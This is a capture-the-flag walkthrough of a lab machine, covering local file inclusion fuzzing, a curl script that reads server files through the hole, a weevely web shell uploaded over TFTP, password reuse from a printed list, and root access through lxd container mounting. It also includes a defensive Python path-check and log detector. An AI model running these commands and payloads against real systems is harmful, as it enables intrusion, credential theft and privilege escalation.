
Included

Difficulty : Very Easy
Operating System : Linux
Rating : 5.0
Author : TRX

Description

Another machine in the "Starting Point" series, where we run head-on into an LFI that lets us get a user on the box, and then keep escalating privileges by building a vulnerable lxc image. Let's go!

Enumeration

For the basic enumeration I'll use a tool I developed specifically for working with machines on the Hack The Box platform. It creates the working directory, runs a basic nmap scan and, if it finds a web service, launches a basic enumeration against it.

Download: HTBenum

Nmap

Nmap scan report for included.htb (10.10.10.55)
Host is up (0.064s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://included.htb/?file=index.php

Whatweb

http://included.htb [302 Found] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55], RedirectLocation[http://included.htb/index.php?file=index.php]
http://included.htb/index.php?file=index.php [301 Moved Permanently] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55], RedirectLocation[http://included.htb/?file=index.php], Title[301 Moved Permanently]
http://included.htb/?file=index.php [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55]

HTTP Headers

HTTP/1.1 302 Found
Date: Sat, 07 Aug 2021 14:11:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: http://included.htb/index.php?file=index.php
Content-Length: 3704
Content-Type: text/html; charset=UTF-8

Nikto

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.55
+ Target Hostname:    included.htb
+ Target Port:        80
+ Start Time:         2021-08-07 16:06:33 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Root page / redirects to: http://included.htb/index.php?file=index.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7967 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-08-07 16:16:24 (GMT2) (591 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

User Own

The first thing that catches my eye in the enumeration is the URL http://included.htb/?file=index.php, which returns a [200 OK]. It looks very much like an LFI, so I'll download a wordlist of candidate paths called file_inclusion_linux.txt and run ffuf to see what comes back.

[root@htb included]# ffuf -w file_inclusion_linux.txt:FUZZ -u "http://included.htb/?file=FUZZ" -fs 3704

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://included.htb/?file=FUZZ
 :: Wordlist         : FUZZ: file_inclusion_linux.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 3704
________________________________________________

../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 3927, Words: 274, Lines: 103]
../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../etc/group   [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../etc/passwd  [Status: 200, Size: 5279, Words: 262, Lines: 124]
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
/../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/passwd&=%3C%3C%3C%3C [Status: 200, Size: 5279, Words: 262, Lines: 124]
:: Progress: [2247/2247] :: Job [1/1] :: 612 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

Sure enough, we can read /etc/passwd

[root@htb included]# curl -s "http://included.htb/?file=../../../../../etc/passwd" | sed 's/<[^>]*>//g'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
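As an added defensive counterpart (not part of the original writeup): a Python resolver for a `?file=` parameter that decodes exactly once, confines the normalised path to the document root and allow-lists `.php`, followed by a scan of constructed Apache access-log lines built from the payload shapes the ffuf run above surfaced. The web root path, the client IP and the log lines are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumed (not from the writeup): the site's document root and the one extension it serves.
WEB_ROOT = "/var/www/html"
ALLOWED_EXT = ".php"

def resolve_include(param, web_root=WEB_ROOT):
    """Return the path a hardened `?file=` handler may include, or None to refuse.

    The box's index.php included whatever `file` named, so plain and
    percent-encoded traversal reached /etc/passwd and the tftp upload dir."""
    decoded = unquote(param)  # decode exactly once, as the server does; never loop
    if "\x00" in decoded:
        return None
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None  # normalised path escaped the document root
    if not candidate.endswith(ALLOWED_EXT):
        return None  # inside the root, but not an includable script
    return candidate

# Constructed Apache access-log sample using the payload shapes from the ffuf run above.
SAMPLE_LOG = """\
10.10.14.2 - - [07/Aug/2021:16:20:01 +0200] "GET /?file=index.php HTTP/1.1" 200 3704
10.10.14.2 - - [07/Aug/2021:16:20:02 +0200] "GET /?file=../../../../../etc/passwd HTTP/1.1" 200 5279
10.10.14.2 - - [07/Aug/2021:16:20:03 +0200] "GET /?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 5279
10.10.14.2 - - [07/Aug/2021:16:20:04 +0200] "GET /?file=/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 5279
10.10.14.2 - - [07/Aug/2021:16:20:05 +0200] "GET /?file=../../../../../var/lib/tftpboot/evil.php HTTP/1.1" 200 612
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_requests(log_text):
    """Return the raw `file=` values the hardened resolver would refuse (detection view)."""
    flagged = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        # Split the query by hand so the value stays raw; parse_qs would pre-decode it.
        for part in urlsplit(m.group(1)).query.split("&"):
            key, _, raw = part.partition("=")
            if key == "file" and resolve_include(raw) is None:
                flagged.append(raw)
    return flagged
```

Running `flag_requests(SAMPLE_LOG)` returns the four traversal values and leaves `index.php` alone; the same resolver is what the vulnerable include should have called before touching the filesystem.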

We can write a small script to work comfortably with files on this particular site, stripping out the HTML tags and the text we're not interested in

[root@htb included]# cat xplfi.sh
#!/bin/bash
# Usage: ./xplfi.sh /absolute/path  -> fetches that file through the LFI and strips the page noise
FILE="$1"
# Strip HTML tags, drop everything from the "Titan" template text onwards, then remove blank lines
curl -s "http://included.htb/?file=../../../../..$FILE" | sed 's/<[^>]*>//g' | sed '/Titan/I,+200 d' | sed '/^ *$/d'

[root@htb included]# ./xplfi.sh "/etc/os-release"
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

After enumerating various system files, the tftp user I found in /etc/passwd catches my attention, and I come across this article on how to configure it on Ubuntu

[root@htb included]# ./xplfi.sh "/etc/default/tftpd-hpa"
# /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/lib/tftpboot"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="-s -l -c"

Knowing it listens on a UDP port (which is why nmap didn't show it) and that its working directory is /var/lib/tftpboot, we'll use weevely to upload a shell and interact with the server.

# Generate the shell with weevely
[root@htb included]# weevely generate lala evil.php
Generated 'evil.php' with password 'lala' of 677 byte size.

# Connect to the tftp server
[root@htb included]# tftp included.htb
tftp> status
Connected to included.htb.
Mode: netascii Verbose: off Tracing: off Literal: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
tftp> verbose
Verbose mode on.
tftp> put evil.php
putting evil.php to included.htb:evil.php [netascii]
Sent 687 bytes in -7.1 seconds [-771 bit/s]
tftp>

# Connect weevely to the URL through the LFI
[root@htb included]# weevely "http://included.htb/?file=../../../../../var/lib/tftpboot/evil.php" lala

[+] weevely 4.0.1

[+] Target:     included.htb
[+] Session:    /root/.weevely/sessions/included.htb/_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@included:/var/www/html $

After enumerating endlessly, I decide to try "bruteforcing" the mike user with the passwords obtained on the previous machines...

[root@htb included]# cat passwords.txt
741852963
Sheffield19
qwerty789
P_-U9dA6q.B|
P@s5w0rd!postgres
P@s5w0rd!
Password1234!
MEGACORP_4dm1n!!
mc@F1l3ZilL4
M3g4C0rpUs3r!
M3g4c0rp123

www-data@included:/$ su mike
Password: Sheffield19
mike@included:/$ id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)
mike@included:/$

So now we're user mike.. oh well :/

Root Own

To become root from the mike user, we'll take advantage of being members of the lxd group to exploit this vulnerability

mike@included:/tmp$ id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)

Building a vulnerable image..

# Install Go on Debian
$ nano ~/.bashrc
# append the following lines at the end
export GOPATH=/home/git/go
export GOROOT=/usr/local/src/go
export PATH=${PATH}:$GOROOT/bin:/home/git/go/bin
$ source ~/.bashrc
$ wget $(curl -s https://golang.org/dl/ |grep --color=never -i linux-amd64.tar.gz |head -n1|awk '{print $4}'|sed 's#href="#https://golang.org#g'|sed 's#">##g')
$ tar zxf go*.linux-amd64.tar.gz
$ mv go $GOROOT
$ rm -rf go*.linux-amd64.tar.gz*

# Build the image with distrobuilder
$ apt install debootstrap rsync gpg squashfs-tools
$ git clone https://github.com/lxc/distrobuilder
$ cd distrobuilder;make
$ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
$ distrobuilder build-lxd alpine.yaml -o image.release=3.8

# Now upload the following files to the target
lxd.tar.xz
rootfs.squashfs

# Add the image
mike@included:/tmp/lala$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 5a4ea6c6a2c554f3c6c003f7d51490ca08f9b99ecc7d578

mike@included:/tmp/lala$ lxc image list
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
|   ALIAS   | FINGERPRINT  | PUBLIC |              DESCRIPTION               |  ARCH  |  SIZE  |         UPLOAD DATE         |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
| alpine    | 5a4ea6c6a2c5 | no     | Alpinelinux 3.8 x86_64 (20210807_1819) | x86_64 | 1.92MB | Aug 7, 2021 at 6:31pm (UTC) |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
| rootimage | 60534e606b2a | no     | alpine v3.14 (20210807_11:34)          | x86_64 | 3.10MB | Aug 7, 2021 at 3:46pm (UTC) |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+

mike@included:/tmp/lala$ lxc init alpine privesc -c security.privileged=true
Creating privesc

mike@included:/tmp/lala$ lxc list
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
|  NAME   |  STATE  |         IPV4         |                     IPV6                      |    TYPE    | SNAPSHOTS |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
| ignite  | RUNNING | 10.124.177.74 (eth0) | fd42:eff6:712f:c3a0:216:3eff:fe63:4b0f (eth0) | PERSISTENT | 0         |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
| privesc | STOPPED |                      |                                               | PERSISTENT | 0         |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+

mike@included:/tmp/lala$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc

mike@included:/tmp/lala$ lxc start privesc
mike@included:/tmp/lala$ lxc exec privesc /bin/sh
~ # cd /mnt/root
/mnt/root # ls
bin             dev             initrd.img      lib64           mnt             root            snap            sys             var
boot            etc             initrd.img.old  lost+found      opt             run             srv             tmp             vmlinuz
cdrom           home            lib             media           proc            sbin            swap.img        usr             vmlinuz.old
/mnt/root # cd root
/mnt/root/root # ls
login.sql  root.txt

With the process above we've mounted the entire root filesystem / inside a container, and we can now read and write to the system with root permissions

EXTRA: the file login.sql contains credentials that we may well need on the next machine...

Daniel
>SNDv*2wzLWf
